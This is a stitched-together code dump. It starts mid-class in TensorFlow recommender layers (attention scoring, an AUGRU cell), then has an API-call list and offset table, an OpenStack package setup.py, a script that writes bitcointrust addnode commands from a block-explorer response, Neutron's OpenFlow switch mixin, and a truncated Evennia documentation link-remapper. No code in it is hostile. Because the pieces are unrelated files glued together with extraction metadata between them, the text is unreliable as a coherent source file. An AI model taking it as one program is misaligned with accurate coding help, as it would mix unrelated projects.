target_shape = input_shape[0]
hidden_shape = input_shape[1]
self.kernel = self.add_weight(shape=(hidden_shape[-1], target_shape[-1]))
def call(self, inputs, training=False, mask=None):
"""
hidden_state: None,his_len,hidden_size
target: None,1,input_size
mask: None,his_len
"""
target, hidden_state = inputs
trans = tf.matmul(hidden_state, self.kernel) # None,his_len,input_size
score = tf.matmul(trans, target, transpose_b=True) # None,his_len,1
mask = tf.expand_dims(mask, axis=-1)
mask = tf.cast(mask, dtype=score.dtype)
score += (1. - mask) * -1e9
score = tf.nn.softmax(score, axis=1)
return score
class AUGRUCell(keras.layers.AbstractRNNCell):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.update_gate = keras.layers.Dense(units, activation=tf.nn.sigmoid)
self.reset_gate = keras.layers.Dense(units, activation=tf.nn.sigmoid)
self.hidden_layer = keras.layers.Dense(units, activation=tf.nn.tanh)
@property
def state_size(self):
return self.units
def call(self, inputs, states):
"""
states: None,hidden_size
inputs: None,input_size
"""
prev_output = states[0]
attention_score = inputs[:, -1:]
inputs = inputs[:, :-1]
concat = tf.concat([prev_output, inputs], axis=-1)
update_state = self.update_gate(concat)
reset_state = self.reset_gate(concat)
hidden_state = self.hidden_layer(tf.concat([inputs, reset_state * prev_output], axis=-1))
update_state *= attention_score
output = update_state * hidden_state + (1 - update_state) * prev_output
return output, output
class InterestEvolve(keras.layers.Layer):
def __init__(self, gru_units):
super().__init__()
self.augru = keras.layers.RNN(AUGRUCell(gru_units))
def call(self, inputs, training=False, mask=None):
"""
history_state: None,his_len,input_size
attention_score: None,his_len,1
"""
history_state, attention_score = inputs
inputs = tf.concat([history_state, attention_score], axis=-1)
output = self.augru(inputs, mask=mask)
return output
|
[
"tensorflow.nn.softmax",
"tensorflow.reduce_sum",
"tensorflow.keras.layers.BatchNormalization",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.layers.GRU",
"tensorflow.concat",
"tensorflow.zeros_like",
"tensorflow.ones_like",
"tensorflow.nn.sigmoid_cross_entropy_with_logits",
"tensorflow.cast",
"tensorflow.matmul",
"tensorflow.squeeze",
"tensorflow.repeat",
"tensorflow.expand_dims"
] |
[((246, 275), 'tensorflow.expand_dims', 'tf.expand_dims', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (260, 275), True, 'import tensorflow as tf\n'), ((287, 327), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'his_embedding.dtype'}), '(mask, dtype=his_embedding.dtype)\n', (294, 327), True, 'import tensorflow as tf\n'), ((369, 396), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['mask'], {'axis': '(1)'}), '(mask, axis=1)\n', (382, 396), True, 'import tensorflow as tf\n'), ((427, 463), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['his_embedding'], {'axis': '(1)'}), '(his_embedding, axis=1)\n', (440, 463), True, 'import tensorflow as tf\n'), ((676, 709), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (707, 709), False, 'from tensorflow import keras\n'), ((1192, 1243), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(80)'], {'activation': 'tf.nn.sigmoid'}), '(80, activation=tf.nn.sigmoid)\n', (1213, 1243), True, 'import tensorflow as tf\n'), ((1267, 1318), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(40)'], {'activation': 'tf.nn.sigmoid'}), '(40, activation=tf.nn.sigmoid)\n', (1288, 1318), True, 'import tensorflow as tf\n'), ((1342, 1366), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)'], {}), '(1)\n', (1363, 1366), True, 'import tensorflow as tf\n'), ((1651, 1704), 'tensorflow.repeat', 'tf.repeat', (['target'], {'repeats': '[history.shape[1]]', 'axis': '(1)'}), '(target, repeats=[history.shape[1]], axis=1)\n', (1660, 1704), True, 'import tensorflow as tf\n'), ((1760, 1833), 'tensorflow.concat', 'tf.concat', (['[target, history, target - history, target * history]'], {'axis': '(-1)'}), '([target, history, target - history, target * history], axis=-1)\n', (1769, 1833), True, 'import tensorflow as tf\n'), ((1997, 2026), 'tensorflow.expand_dims', 'tf.expand_dims', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (2011, 2026), True, 'import tensorflow as tf\n'), ((2071, 2105), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'weights.dtype'}), '(mask, dtype=weights.dtype)\n', (2078, 2105), True, 'import tensorflow as tf\n'), ((2163, 2208), 'tensorflow.matmul', 'tf.matmul', (['weights', 'history'], {'transpose_a': '(True)'}), '(weights, history, transpose_a=True)\n', (2172, 2208), True, 'import tensorflow as tf\n'), ((2267, 2309), 'tensorflow.squeeze', 'tf.squeeze', (['history_representation'], {'axis': '(1)'}), '(history_representation, axis=1)\n', (2277, 2309), True, 'import tensorflow as tf\n'), ((3027, 3083), 'tensorflow.keras.layers.GRU', 'keras.layers.GRU', ([], {'units': 'gru_units', 'return_sequences': '(True)'}), '(units=gru_units, return_sequences=True)\n', (3043, 3083), False, 'from tensorflow import keras\n'), ((3250, 3293), 'tensorflow.concat', 'tf.concat', (['[hidden_state, history]'], {'axis': '(-1)'}), '([hidden_state, history], axis=-1)\n', (3259, 3293), True, 'import tensorflow as tf\n'), ((3374, 3401), 'tensorflow.squeeze', 'tf.squeeze', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\n', (3384, 3401), True, 'import tensorflow as tf\n'), ((3952, 3976), 'tensorflow.ones_like', 'tf.ones_like', (['pos_logits'], {}), '(pos_logits)\n', (3964, 3976), True, 'import tensorflow as tf\n'), ((3997, 4022), 'tensorflow.zeros_like', 'tf.zeros_like', (['neg_logits'], {}), '(neg_logits)\n', (4010, 4022), True, 'import tensorflow as tf\n'), ((4042, 4104), 'tensorflow.nn.sigmoid_cross_entropy_with_logits', 'tf.nn.sigmoid_cross_entropy_with_logits', (['pos_label', 'pos_logits'], {}), '(pos_label, pos_logits)\n', (4081, 4104), True, 'import tensorflow as tf\n'), ((4140, 4202), 'tensorflow.nn.sigmoid_cross_entropy_with_logits', 'tf.nn.sigmoid_cross_entropy_with_logits', (['neg_label', 'neg_logits'], {}), '(neg_label, neg_logits)\n', (4179, 4202), True, 'import tensorflow as tf\n'), ((4234, 4263), 'tensorflow.cast', 'tf.cast', (['mask', 'pos_loss.dtype'], {}), '(mask, pos_loss.dtype)\n', (4241, 4263), True, 'import tensorflow as tf\n'), ((4346, 4386), 'tensorflow.concat', 'tf.concat', (['[pos_loss, neg_loss]'], {'axis': '(-1)'}), '([pos_loss, neg_loss], axis=-1)\n', (4355, 4386), True, 'import tensorflow as tf\n'), ((4416, 4461), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['auxiliary_loss_concat'], {'axis': '(-1)'}), '(auxiliary_loss_concat, axis=-1)\n', (4429, 4461), True, 'import tensorflow as tf\n'), ((6455, 6491), 'tensorflow.matmul', 'tf.matmul', (['hidden_state', 'self.kernel'], {}), '(hidden_state, self.kernel)\n', (6464, 6491), True, 'import tensorflow as tf\n'), ((6535, 6577), 'tensorflow.matmul', 'tf.matmul', (['trans', 'target'], {'transpose_b': '(True)'}), '(trans, target, transpose_b=True)\n', (6544, 6577), True, 'import tensorflow as tf\n'), ((6611, 6640), 'tensorflow.expand_dims', 'tf.expand_dims', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (6625, 6640), True, 'import tensorflow as tf\n'), ((6656, 6688), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'score.dtype'}), '(mask, dtype=score.dtype)\n', (6663, 6688), True, 'import tensorflow as tf\n'), ((6741, 6769), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['score'], {'axis': '(1)'}), '(score, axis=1)\n', (6754, 6769), True, 'import tensorflow as tf\n'), ((6970, 7021), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units'], {'activation': 'tf.nn.sigmoid'}), '(units, activation=tf.nn.sigmoid)\n', (6988, 7021), False, 'from tensorflow import keras\n'), ((7048, 7099), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units'], {'activation': 'tf.nn.sigmoid'}), '(units, activation=tf.nn.sigmoid)\n', (7066, 7099), False, 'from tensorflow import keras\n'), ((7128, 7176), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units'], {'activation': 'tf.nn.tanh'}), '(units, activation=tf.nn.tanh)\n', (7146, 7176), False, 'from tensorflow import keras\n'), ((7492, 7533), 'tensorflow.concat', 'tf.concat', (['[prev_output, inputs]'], {'axis': '(-1)'}), '([prev_output, inputs], axis=-1)\n', (7501, 7533), True, 'import tensorflow as tf\n'), ((8275, 8327), 'tensorflow.concat', 'tf.concat', (['[history_state, attention_score]'], {'axis': '(-1)'}), '([history_state, attention_score], axis=-1)\n', (8284, 8327), True, 'import tensorflow as tf\n'), ((730, 773), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['unit'], {'activation': '"""relu"""'}), "(unit, activation='relu')\n", (748, 773), False, 'from tensorflow import keras\n'), ((822, 879), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['units[-1]'], {'activation': 'last_activation'}), '(units[-1], activation=last_activation)\n', (840, 879), False, 'from tensorflow import keras\n'), ((2547, 2593), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['unit'], {'activation': '"""sigmoid"""'}), "(unit, activation='sigmoid')\n", (2565, 2593), False, 'from tensorflow import keras\n'), ((2649, 2699), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['mlp_units[-1]'], {'activation': 'None'}), '(mlp_units[-1], activation=None)\n', (2667, 2699), False, 'from tensorflow import keras\n'), ((4490, 4518), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['mask'], {'axis': '(-1)'}), '(mask, axis=-1)\n', (4503, 4518), True, 'import tensorflow as tf\n'), ((7670, 7725), 'tensorflow.concat', 'tf.concat', (['[inputs, reset_state * prev_output]'], {'axis': '(-1)'}), '([inputs, reset_state * prev_output], axis=-1)\n', (7679, 7725), True, 'import tensorflow as tf\n')]
|
# Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from file_connector.swift import _pkginfo
setup(
name=_pkginfo.name,
version=_pkginfo.full_version,
description='Nas Connector',
license='Apache License (2.0)',
author='SwiftStack',
packages=find_packages(exclude=['test', 'bin']),
test_suite='nose.collector',
classifiers=[
'Development Status :: 5 - Production/Stable'
'Environment :: OpenStack'
'Intended Audience :: Information Technology'
'Intended Audience :: System Administrators'
'License :: OSI Approved :: Apache Software License'
'Operating System :: POSIX :: Linux'
'Programming Language :: Python'
'Programming Language :: Python :: 2'
'Programming Language :: Python :: 2.6'
'Programming Language :: Python :: 2.7'
],
install_requires=[],
#scripts=[
# 'bin/fileconnector-gen-builders',
#],
entry_points={
'paste.app_factory': [
'proxy=file_connector.swift.proxy.server:app_factory',
'object=file_connector.swift.obj.server:app_factory',
'container=file_connector.swift.container.server:app_factory',
'account=file_connector.swift.account.server:app_factory',
],
'paste.filter_factory': [
'file_auth=file_connector.swift.common.middleware.'
'file_auth:filter_factory'
],
},
)
|
[
"setuptools.find_packages"
] |
[((844, 882), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['test', 'bin']"}), "(exclude=['test', 'bin'])\n", (857, 882), False, 'from setuptools import setup, find_packages\n')]
|
#!/usr/bin/env python3
"""
Agregar nodos de bitcointrust manualmente obteniendo la información desde el explorador de bloques
Manually add bitcointrust nodes to daemon
(python 3.x)
"""
import json
import requests
from config import *
try:
# Get las 24 hours nodes from blockchain explorer
data = requests.get(URL_EXPLORER)
if data.status_code == 200: # OK
with open("./addnodes.sh", "w") as text_file:
text_file.write(f"#!/bin/bash\n# This file is autogenerated by print_active_nodes.py\n")
for i in json.loads(data.text)[0]['nodes']:
print(f"Node: {i}")
text_file.write(f"echo Adding node {i}\n")
if not DATADIR:
text_file.write(f"{DAEMON_PATH} addnode {i} add\n")
else:
text_file.write(f"{DAEMON_PATH} --datadir={DATADIR} addnode {i} add\n")
print("\nPlease run addnodes.sh to add nodes to bitcointrust daemon.")
else:
print(f"Bitcointrust Blockchain Explorer not responding ( {URL_EXPLORER} )")
except:
print(f"ERROR: No connection for {URL_EXPLORER} ")
|
[
"json.loads",
"requests.get"
] |
[((307, 333), 'requests.get', 'requests.get', (['URL_EXPLORER'], {}), '(URL_EXPLORER)\n', (319, 333), False, 'import requests\n'), ((547, 568), 'json.loads', 'json.loads', (['data.text'], {}), '(data.text)\n', (557, 568), False, 'import json\n')]
|
# Copyright (C) 2014,2015 VA Linux Systems Japan K.K.
# Copyright (C) 2014,2015 <NAME> <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import random
import eventlet
import netaddr
from neutron_lib import exceptions
import os_ken.app.ofctl.api as ofctl_api
import os_ken.exception as os_ken_exc
from os_ken.lib import ofctl_string
from os_ken.ofproto import ofproto_parser
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import timeutils
import six
from neutron._i18n import _
from neutron.agent.common import ovs_lib
LOG = logging.getLogger(__name__)
BUNDLE_ID_WIDTH = 1 << 32
COOKIE_DEFAULT = object()
class ActiveBundleRunning(exceptions.NeutronException):
message = _("Another active bundle 0x%(bundle_id)x is running")
class OpenFlowSwitchMixin(object):
"""Mixin to provide common convenient routines for an openflow switch.
NOTE(yamamoto): super() points to ovs_lib.OVSBridge.
See ovs_bridge.py how this class is actually used.
"""
@staticmethod
def _cidr_to_os_ken(ip):
n = netaddr.IPNetwork(ip)
if n.hostmask:
return (str(n.ip), str(n.netmask))
return str(n.ip)
def __init__(self, *args, **kwargs):
self._app = kwargs.pop('os_ken_app')
self.active_bundles = set()
super(OpenFlowSwitchMixin, self).__init__(*args, **kwargs)
def _get_dp_by_dpid(self, dpid_int):
"""Get os-ken datapath object for the switch."""
timeout_sec = cfg.CONF.OVS.of_connect_timeout
start_time = timeutils.now()
while True:
dp = ofctl_api.get_datapath(self._app, dpid_int)
if dp is not None:
break
# The switch has not established a connection to us.
# Wait for a little.
if timeutils.now() > start_time + timeout_sec:
m = _("Switch connection timeout")
LOG.error(m)
# NOTE(yamamoto): use RuntimeError for compat with ovs_lib
raise RuntimeError(m)
eventlet.sleep(1)
return dp
def _send_msg(self, msg, reply_cls=None, reply_multi=False,
active_bundle=None):
timeout_sec = cfg.CONF.OVS.of_request_timeout
timeout = eventlet.Timeout(seconds=timeout_sec)
if active_bundle is not None:
(dp, ofp, ofpp) = self._get_dp()
msg = ofpp.ONFBundleAddMsg(dp, active_bundle['id'],
active_bundle['bundle_flags'], msg, [])
try:
result = ofctl_api.send_msg(self._app, msg, reply_cls, reply_multi)
except os_ken_exc.OSKenException as e:
m = _("ofctl request %(request)s error %(error)s") % {
"request": msg,
"error": e,
}
LOG.error(m)
# NOTE(yamamoto): use RuntimeError for compat with ovs_lib
raise RuntimeError(m)
except eventlet.Timeout as e:
with excutils.save_and_reraise_exception() as ctx:
if e is timeout:
ctx.reraise = False
m = _("ofctl request %(request)s timed out") % {
"request": msg,
}
LOG.error(m)
# NOTE(yamamoto): use RuntimeError for compat with ovs_lib
raise RuntimeError(m)
finally:
timeout.cancel()
LOG.debug("ofctl request %(request)s result %(result)s",
{"request": msg, "result": result})
return result
@staticmethod
def _match(_ofp, ofpp, match, **match_kwargs):
if match is not None:
return match
return ofpp.OFPMatch(**match_kwargs)
def uninstall_flows(self, table_id=None, strict=False, priority=0,
cookie=COOKIE_DEFAULT, cookie_mask=0,
match=None, active_bundle=None, **match_kwargs):
(dp, ofp, ofpp) = self._get_dp()
if table_id is None:
table_id = ofp.OFPTT_ALL
if cookie == ovs_lib.COOKIE_ANY:
cookie = 0
if cookie_mask != 0:
raise Exception(_("cookie=COOKIE_ANY but cookie_mask set to "
"%s") %
cookie_mask)
elif cookie == COOKIE_DEFAULT:
cookie = self._default_cookie
cookie_mask = ovs_lib.UINT64_BITMASK
match = self._match(ofp, ofpp, match, **match_kwargs)
if strict:
cmd = ofp.OFPFC_DELETE_STRICT
else:
cmd = ofp.OFPFC_DELETE
msg = ofpp.OFPFlowMod(dp,
command=cmd,
cookie=cookie,
cookie_mask=cookie_mask,
table_id=table_id,
match=match,
priority=priority,
out_group=ofp.OFPG_ANY,
out_port=ofp.OFPP_ANY)
self._send_msg(msg, active_bundle=active_bundle)
def dump_flows(self, table_id=None):
(dp, ofp, ofpp) = self._get_dp()
if table_id is None:
table_id = ofp.OFPTT_ALL
msg = ofpp.OFPFlowStatsRequest(dp, table_id=table_id)
replies = self._send_msg(msg,
reply_cls=ofpp.OFPFlowStatsReply,
reply_multi=True)
flows = []
for rep in replies:
flows += rep.body
return flows
def _dump_and_clean(self, table_id=None):
cookies = set([f.cookie for f in self.dump_flows(table_id)]) - \
self.reserved_cookies
for c in cookies:
LOG.warning("Deleting flow with cookie 0x%(cookie)x",
{'cookie': c})
self.uninstall_flows(cookie=c, cookie_mask=ovs_lib.UINT64_BITMASK)
def cleanup_flows(self):
LOG.info("Reserved cookies for %s: %s", self.br_name,
self.reserved_cookies)
for table_id in self.of_tables:
self._dump_and_clean(table_id)
def install_goto_next(self, table_id, active_bundle=None):
self.install_goto(table_id=table_id, dest_table_id=table_id + 1,
active_bundle=active_bundle)
def install_output(self, port, table_id=0, priority=0,
match=None, **match_kwargs):
(_dp, ofp, ofpp) = self._get_dp()
actions = [ofpp.OFPActionOutput(port, 0)]
instructions = [ofpp.OFPInstructionActions(
ofp.OFPIT_APPLY_ACTIONS, actions)]
self.install_instructions(table_id=table_id, priority=priority,
instructions=instructions,
match=match, **match_kwargs)
def install_normal(self, table_id=0, priority=0,
match=None, **match_kwargs):
(_dp, ofp, _ofpp) = self._get_dp()
self.install_output(port=ofp.OFPP_NORMAL,
table_id=table_id, priority=priority,
match=match, **match_kwargs)
def install_goto(self, dest_table_id, table_id=0, priority=0,
match=None, **match_kwargs):
(_dp, _ofp, ofpp) = self._get_dp()
instructions = [ofpp.OFPInstructionGotoTable(table_id=dest_table_id)]
self.install_instructions(table_id=table_id, priority=priority,
instructions=instructions,
match=match, **match_kwargs)
def install_drop(self, table_id=0, priority=0, match=None, **match_kwargs):
self.install_instructions(table_id=table_id, priority=priority,
instructions=[], match=match, **match_kwargs)
def install_instructions(self, instructions,
table_id=0, priority=0,
match=None, active_bundle=None, **match_kwargs):
(dp, ofp, ofpp) = self._get_dp()
match = self._match(ofp, ofpp, match, **match_kwargs)
if isinstance(instructions, six.string_types):
# NOTE: instructions must be str for the ofctl of_interface.
# After the ofctl driver is removed, a deprecation warning
# could be added here.
jsonlist = ofctl_string.ofp_instruction_from_str(
ofp, instructions)
instructions = ofproto_parser.ofp_instruction_from_jsondict(
dp, jsonlist)
msg = ofpp.OFPFlowMod(dp,
table_id=table_id,
cookie=self.default_cookie,
match=match,
priority=priority,
instructions=instructions)
self._send_msg(msg, active_bundle=active_bundle)
def install_apply_actions(self, actions,
table_id=0, priority=0,
match=None, **match_kwargs):
(dp, ofp, ofpp) = self._get_dp()
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
]
self.install_instructions(table_id=table_id,
priority=priority,
match=match,
instructions=instructions,
**match_kwargs)
def bundled(self, atomic=False, ordered=False):
return BundledOpenFlowBridge(self, atomic, ordered)
class BundledOpenFlowBridge(object):
def __init__(self, br, atomic, ordered):
self.br = br
self.active_bundle = None
self.bundle_flags = 0
if not atomic and not ordered:
return
(dp, ofp, ofpp) = self.br._get_dp()
if atomic:
self.bundle_flags |= ofp.ONF_BF_ATOMIC
if ordered:
self.bundle_flags |= ofp.ONF_BF_ORDERED
def __getattr__(self, name):
if name.startswith('install') or name.startswith('uninstall'):
under = getattr(self.br, name)
if self.active_bundle is None:
return under
return functools.partial(under, active_bundle=dict(
id=self.active_bundle, bundle_flags=self.bundle_flags))
raise AttributeError(_("Only install_* or uninstall_* methods "
"can be used"))
def __enter__(self):
if self.active_bundle is not None:
raise ActiveBundleRunning(bundle_id=self.active_bundle)
while True:
self.active_bundle = random.randrange(BUNDLE_ID_WIDTH)
if self.active_bundle not in self.br.active_bundles:
self.br.active_bundles.add(self.active_bundle)
break
try:
(dp, ofp, ofpp) = self.br._get_dp()
msg = ofpp.ONFBundleCtrlMsg(dp, self.active_bundle,
ofp.ONF_BCT_OPEN_REQUEST,
self.bundle_flags, [])
reply = self.br._send_msg(msg, reply_cls=ofpp.ONFBundleCtrlMsg)
if reply.type != ofp.ONF_BCT_OPEN_REPLY:
raise RuntimeError(
_("Unexpected reply type %d != ONF_BCT_OPEN_REPLY") %
reply.type)
return self
except Exception:
self.br.active_bundles.remove(self.active_bundle)
self.active_bundle = None
raise
def __exit__(self, type, value, traceback):
(dp, ofp, ofpp) = self.br._get_dp()
if type is None:
ctrl_type = ofp.ONF_BCT_COMMIT_REQUEST
expected_reply = ofp.ONF_BCT_COMMIT_REPLY
else:
ctrl_type = ofp.ONF_BCT_DISCARD_REQUEST
expected_reply = ofp.ONF_BCT_DISCARD_REPLY
LOG.warning(
"Discarding bundle with ID 0x%(id)x due to an exception",
{'id': self.active_bundle})
try:
msg = ofpp.ONFBundleCtrlMsg(dp, self.active_bundle,
ctrl_type,
self.bundle_flags, [])
reply = self.br._send_msg(msg, reply_cls=ofpp.ONFBundleCtrlMsg)
if reply.type != expected_reply:
# The bundle ID may be in a bad state. Let's leave it
# in active_bundles so that we will never use it again.
raise RuntimeError(_("Unexpected reply type %d") % reply.type)
self.br.active_bundles.remove(self.active_bundle)
finally:
# It is possible the bundle is kept open, but this must be
# cleared or all subsequent __enter__ will fail.
self.active_bundle = None
|
[
"os_ken.app.ofctl.api.send_msg",
"os_ken.lib.ofctl_string.ofp_instruction_from_str",
"oslo_log.log.getLogger",
"os_ken.ofproto.ofproto_parser.ofp_instruction_from_jsondict",
"neutron._i18n._",
"oslo_utils.excutils.save_and_reraise_exception",
"random.randrange",
"os_ken.app.ofctl.api.get_datapath",
"netaddr.IPNetwork",
"eventlet.Timeout",
"oslo_utils.timeutils.now",
"eventlet.sleep"
] |
[((1185, 1212), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1202, 1212), True, 'from oslo_log import log as logging\n'), ((1338, 1391), 'neutron._i18n._', '_', (['"""Another active bundle 0x%(bundle_id)x is running"""'], {}), "('Another active bundle 0x%(bundle_id)x is running')\n", (1339, 1391), False, 'from neutron._i18n import _\n'), ((1685, 1706), 'netaddr.IPNetwork', 'netaddr.IPNetwork', (['ip'], {}), '(ip)\n', (1702, 1706), False, 'import netaddr\n'), ((2166, 2181), 'oslo_utils.timeutils.now', 'timeutils.now', ([], {}), '()\n', (2179, 2181), False, 'from oslo_utils import timeutils\n'), ((2890, 2927), 'eventlet.Timeout', 'eventlet.Timeout', ([], {'seconds': 'timeout_sec'}), '(seconds=timeout_sec)\n', (2906, 2927), False, 'import eventlet\n'), ((2219, 2262), 'os_ken.app.ofctl.api.get_datapath', 'ofctl_api.get_datapath', (['self._app', 'dpid_int'], {}), '(self._app, dpid_int)\n', (2241, 2262), True, 'import os_ken.app.ofctl.api as ofctl_api\n'), ((2678, 2695), 'eventlet.sleep', 'eventlet.sleep', (['(1)'], {}), '(1)\n', (2692, 2695), False, 'import eventlet\n'), ((3188, 3246), 'os_ken.app.ofctl.api.send_msg', 'ofctl_api.send_msg', (['self._app', 'msg', 'reply_cls', 'reply_multi'], {}), '(self._app, msg, reply_cls, reply_multi)\n', (3206, 3246), True, 'import os_ken.app.ofctl.api as ofctl_api\n'), ((9031, 9087), 'os_ken.lib.ofctl_string.ofp_instruction_from_str', 'ofctl_string.ofp_instruction_from_str', (['ofp', 'instructions'], {}), '(ofp, instructions)\n', (9068, 9087), False, 'from os_ken.lib import ofctl_string\n'), ((9132, 9190), 'os_ken.ofproto.ofproto_parser.ofp_instruction_from_jsondict', 'ofproto_parser.ofp_instruction_from_jsondict', (['dp', 'jsonlist'], {}), '(dp, jsonlist)\n', (9176, 9190), False, 'from os_ken.ofproto import ofproto_parser\n'), ((11039, 11093), 'neutron._i18n._', '_', (['"""Only install_* or uninstall_* methods can be used"""'], {}), "('Only install_* or uninstall_* methods can be used')\n", (11040, 11093), False, 'from neutron._i18n import _\n'), ((11319, 11352), 'random.randrange', 'random.randrange', (['BUNDLE_ID_WIDTH'], {}), '(BUNDLE_ID_WIDTH)\n', (11335, 11352), False, 'import random\n'), ((2429, 2444), 'oslo_utils.timeutils.now', 'timeutils.now', ([], {}), '()\n', (2442, 2444), False, 'from oslo_utils import timeutils\n'), ((2493, 2523), 'neutron._i18n._', '_', (['"""Switch connection timeout"""'], {}), "('Switch connection timeout')\n", (2494, 2523), False, 'from neutron._i18n import _\n'), ((3310, 3356), 'neutron._i18n._', '_', (['"""ofctl request %(request)s error %(error)s"""'], {}), "('ofctl request %(request)s error %(error)s')\n", (3311, 3356), False, 'from neutron._i18n import _\n'), ((3620, 3657), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (3655, 3657), False, 'from oslo_utils import excutils\n'), ((4825, 4873), 'neutron._i18n._', '_', (['"""cookie=COOKIE_ANY but cookie_mask set to %s"""'], {}), "('cookie=COOKIE_ANY but cookie_mask set to %s')\n", (4826, 4873), False, 'from neutron._i18n import _\n'), ((11942, 11993), 'neutron._i18n._', '_', (['"""Unexpected reply type %d != ONF_BCT_OPEN_REPLY"""'], {}), "('Unexpected reply type %d != ONF_BCT_OPEN_REPLY')\n", (11943, 11993), False, 'from neutron._i18n import _\n'), ((13174, 13203), 'neutron._i18n._', '_', (['"""Unexpected reply type %d"""'], {}), "('Unexpected reply type %d')\n", (13175, 13203), False, 'from neutron._i18n import _\n'), ((3763, 3803), 'neutron._i18n._', '_', (['"""ofctl request %(request)s timed out"""'], {}), "('ofctl request %(request)s timed out')\n", (3764, 3803), False, 'from neutron._i18n import _\n')]
|
"""
Build a TOC-tree; Sphinx requires it and this makes it easy to just
add/build/link new files without needing to explicitly add it to a toctree
directive somewhere.
"""
import re
from collections import defaultdict
from sphinx.errors import DocumentError
from pathlib import Path
from os.path import abspath, dirname, join as pathjoin, sep, relpath
_IGNORE_FILES = []
_SOURCEDIR_NAME = "source"
_SOURCE_DIR = pathjoin(dirname(dirname(abspath(__file__))), _SOURCEDIR_NAME)
_TOC_FILE = pathjoin(_SOURCE_DIR, "toc.md")
_NO_REMAP_STARTSWITH = [
"http://",
"https://",
"github:",
"api:",
"feature-request",
"report-bug",
"issue",
"bug-report",
]
TXT_REMAPS = {}
URL_REMAPS = {}
_USED_REFS = {}
_CURRFILE = None
def auto_link_remapper():
"""
- Auto-Remaps links to fit with the actual document file structure. Requires
all doc files to have a unique name.
- Creates source/toc.md file
"""
global _CURRFILE
print(" -- Auto-Remapper starting.")
def _get_rel_source_ref(path):
"""Get the path relative the source/ dir"""
pathparts = path.split("/")
# we allow a max of 4 levels of nesting in the source dir
ind = pathparts[-5:].index(_SOURCEDIR_NAME)
# get the part after source/
pathparts = pathparts[-5 + 1 + ind :]
url = "/".join(pathparts)
# get the reference, without .md
url = url.rsplit(".", 1)[0]
return url
toc_map = {}
docref_map = defaultdict(dict)
for path in Path(_SOURCE_DIR).rglob("*.md"):
# find the source/ part of the path and strip it out
if path.name in _IGNORE_FILES:
# this is the name including .md
continue
sourcepath = path.as_posix()
# get name and url relative to source/
fname = path.name.rsplit(".", 1)[0]
src_url = _get_rel_source_ref(sourcepath)
# check for duplicate files
if fname in toc_map:
duplicate_src_url = toc_map[fname]
raise DocumentError(
f" Tried to add {src_url}.md, but a file {duplicate_src_url}.md already exists.\n"
" Evennia's auto-link-corrector does not accept doc-files with the same \n"
" name, even in different folders. Rename one.\n"
)
toc_map[fname] = src_url
# find relative links to all other files
for targetpath in Path(_SOURCE_DIR).rglob("*.md"):
targetname = targetpath.name.rsplit(".", 1)[0]
targetpath = targetpath.as_posix()
url = relpath(targetpath, dirname(sourcepath))
if not "/" in url:
# need to be explicit or there will be link ref collisions between
# e.g. TickerHandler page and TickerHandle api node
url = "./" + url
docref_map[sourcepath][targetname] = url.rsplit(".", 1)[0]
# normal reference-links [txt](urls)
ref_regex = re.compile(
r"\[(?P<txt>[\w -\[\]\`]+?)\]\((?P<url>.+?)\)", re.I + re.S + re.U + re.M
)
# in document references
ref_doc_regex = re.compile(
r"\[(?P<txt>[\w -\`]+?)\]:\s+?(?P<url>.+?)(?=$|\n)", re.I + re.S + re.U + re.M
)
def _sub(match):
# inline reference links
global _USED_REFS
grpdict = match.groupdict()
txt, url = grpdict["txt"], grpdict["url"]
txt = TXT_REMAPS.get(txt, txt)
url = URL_REMAPS.get(url, url)
if any(url.startswith(noremap) for noremap in _NO_REMAP_STARTSWITH):
return f"[{txt}]({url})"
if "http" in url and "://" in url:
urlout = url
else:
fname, *part = url.rsplit("/", 1)
fname = part[0] if part else fname
fname = fname.rsplit(".", 1)[0]
